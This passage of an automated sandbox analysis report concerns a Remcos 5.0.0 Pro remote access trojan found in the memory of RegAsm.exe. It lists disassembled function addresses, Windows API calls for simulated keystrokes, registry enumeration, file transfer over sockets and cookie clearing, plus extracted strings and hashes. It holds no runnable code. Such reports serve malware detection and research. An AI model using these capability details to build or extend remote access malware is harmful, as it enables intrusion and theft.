                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7d049b86027effad8d92042d9403d5bfe2ea3e93186a839875c543696ca89538
                                                                        • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                                                                        • Opcode Fuzzy Hash: 7d049b86027effad8d92042d9403d5bfe2ea3e93186a839875c543696ca89538
                                                                        • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                                                                        Function 00445179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                        • _memcmp.LIBVCRUNTIME ref: 00445423
                                                                        • _free.LIBCMT ref: 00445494
                                                                        • _free.LIBCMT ref: 004454AD
                                                                        • _free.LIBCMT ref: 004454DF
                                                                        • _free.LIBCMT ref: 004454E8
                                                                        • _free.LIBCMT ref: 004454F4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorLast$_abort_memcmp
                                                                        • String ID: C
                                                                        • API String ID: 1679612858-1037565863
                                                                        • Opcode ID: 0768c3d9e3dd940518f99a63cbcd3aeb961d046fc1a72f364ae26972a0ea9dca
                                                                        • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                                                        • Opcode Fuzzy Hash: 0768c3d9e3dd940518f99a63cbcd3aeb961d046fc1a72f364ae26972a0ea9dca
                                                                        • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                                                        Function 0041490A Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: tcp$udp
                                                                        • API String ID: 0-3725065008
                                                                        • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                                                        • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                                                        • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                                                        • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                                                        Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                        • ExitThread.KERNEL32 ref: 004018F6
                                                                        • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                                                                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                        • String ID: PkG$XMG$NG$NG
                                                                        • API String ID: 1649129571-3151166067
                                                                        • Opcode ID: 81fea9da0dfeb8000d6547b899e090ac4d29e87f5a57f2266efbc4c4cc34aaff
                                                                        • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                                                        • Opcode Fuzzy Hash: 81fea9da0dfeb8000d6547b899e090ac4d29e87f5a57f2266efbc4c4cc34aaff
                                                                        • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                                                        Function 00407963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 004079C5
                                                                        • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A0D
                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00407A4D
                                                                        • MoveFileW.KERNEL32 ref: 00407A6A
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00407A95
                                                                        • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                                                          • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                                          • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                        • String ID: .part
                                                                        • API String ID: 1303771098-3499674018
                                                                        • Opcode ID: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
                                                                        • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                                                        • Opcode Fuzzy Hash: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
                                                                        • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                                                        Function 0041B68A Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 91COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32 ref: 0041363D
                                                                          • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                                                          • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                                                          • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                                          • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                                        • _wcslen.LIBCMT ref: 0041B763
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                        • String ID: .exe$8SG$@5U$http\shell\open\command$program files (x86)\$program files\
                                                                        • API String ID: 3286818993-1912118750
                                                                        • Opcode ID: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                                                        • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                                                        • Opcode Fuzzy Hash: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                                                        • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                                                        Function 0041CD9B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 48memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • AllocConsole.KERNEL32 ref: 0041CDA4
                                                                        • GetConsoleWindow.KERNEL32 ref: 0041CDAA
                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                                                        • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Console$Window$AllocOutputShow
                                                                        • String ID: Remcos v$5.0.0 Pro$CONOUT$
                                                                        • API String ID: 4067487056-2278869229
                                                                        • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                                                        • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                                                                        • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                                                        • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                                                                        Function 00407260 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 40COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @5U$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Rmc-R2I0JW$`2U
                                                                        • API String ID: 0-2935759176
                                                                        • Opcode ID: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                                                        • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                                                        • Opcode Fuzzy Hash: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                                                        • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                                                        Function 00419993 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 004199CC
                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 004199ED
                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 00419A0D
                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 00419A21
                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 00419A37
                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 00419A54
                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 00419A6F
                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 00419A8B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InputSend
                                                                        • String ID:
                                                                        • API String ID: 3431551938-0
                                                                        • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                                                        • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                                                        • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                                                        • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                                                        Function 00447571 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __freea$__alloca_probe_16_free
                                                                        • String ID: a/p$am/pm$zD
                                                                        • API String ID: 2936374016-2723203690
                                                                        • Opcode ID: 582b27bd1da2528f23ecf4cf811f425633019422103e053086a59298c2d48650
                                                                        • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                                                        • Opcode Fuzzy Hash: 582b27bd1da2528f23ecf4cf811f425633019422103e053086a59298c2d48650
                                                                        • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                                                        Function 00413A55 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413B8B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Enum$InfoQueryValue
                                                                        • String ID: [regsplt]$xUG$TG
                                                                        • API String ID: 3554306468-1165877943
                                                                        • Opcode ID: b730b8f01de3b61de9bdc309d271c932a797a33a56bfebd36572143352d58066
                                                                        • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                                                        • Opcode Fuzzy Hash: b730b8f01de3b61de9bdc309d271c932a797a33a56bfebd36572143352d58066
                                                                        • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                                                        Function 0044B3BC Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetConsoleCP.KERNEL32 ref: 0044B3FE
                                                                        • __fassign.LIBCMT ref: 0044B479
                                                                        • __fassign.LIBCMT ref: 0044B494
                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                                                        • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000), ref: 0044B4D9
                                                                        • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000), ref: 0044B512
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                        • String ID:
                                                                        • API String ID: 1324828854-0
                                                                        • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                                                        • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                                                        • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                                                        • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                                                        Function 00456C1A Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID: D[E$D[E
                                                                        • API String ID: 269201875-3695742444
                                                                        • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                                                        • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                                                                        • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                                                        • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                                                                        Function 10009492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                        • __fassign.LIBCMT ref: 1000954F
                                                                        • __fassign.LIBCMT ref: 1000956A
                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                        • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                                                                        • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                        • String ID:
                                                                        • API String ID: 1324828854-0
                                                                        • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                        • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                        • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                        • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                        Function 00413D0D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegOpenKeyExW.ADVAPI32 ref: 00413D46
                                                                          • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                                                          • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00413EB4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumInfoOpenQuerysend
                                                                        • String ID: xUG$NG$NG$TG
                                                                        • API String ID: 3114080316-2811732169
                                                                        • Opcode ID: 8cc426b5a18ff941664b475a4e5743ade2d40f1813d98070b9e600a2b8e76d58
                                                                        • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                                                                        • Opcode Fuzzy Hash: 8cc426b5a18ff941664b475a4e5743ade2d40f1813d98070b9e600a2b8e76d58
                                                                        • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                                                                        Function 10003370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                        • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                        • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                        • String ID: csm
                                                                        • API String ID: 1170836740-1018135373
                                                                        • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                        • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                        • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                        • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                        Function 0040BEE9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                                          • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
                                                                          • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                                                        • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                                                                        • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                        • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                        • API String ID: 1133728706-4073444585
                                                                        • Opcode ID: 64fa2848a199bd2a40e0896628174b15822387fc8284c7b97a1890df31b02a60
                                                                        • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                                                                        • Opcode Fuzzy Hash: 64fa2848a199bd2a40e0896628174b15822387fc8284c7b97a1890df31b02a60
                                                                        • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                                                                        Function 00456B53 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b15328f38de36e2236e67be376e02f2a3afc52644fcc3b23babb247561bddb00
                                                                        • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                                                        • Opcode Fuzzy Hash: b15328f38de36e2236e67be376e02f2a3afc52644fcc3b23babb247561bddb00
                                                                        • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                                                        Function 0041C3F1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
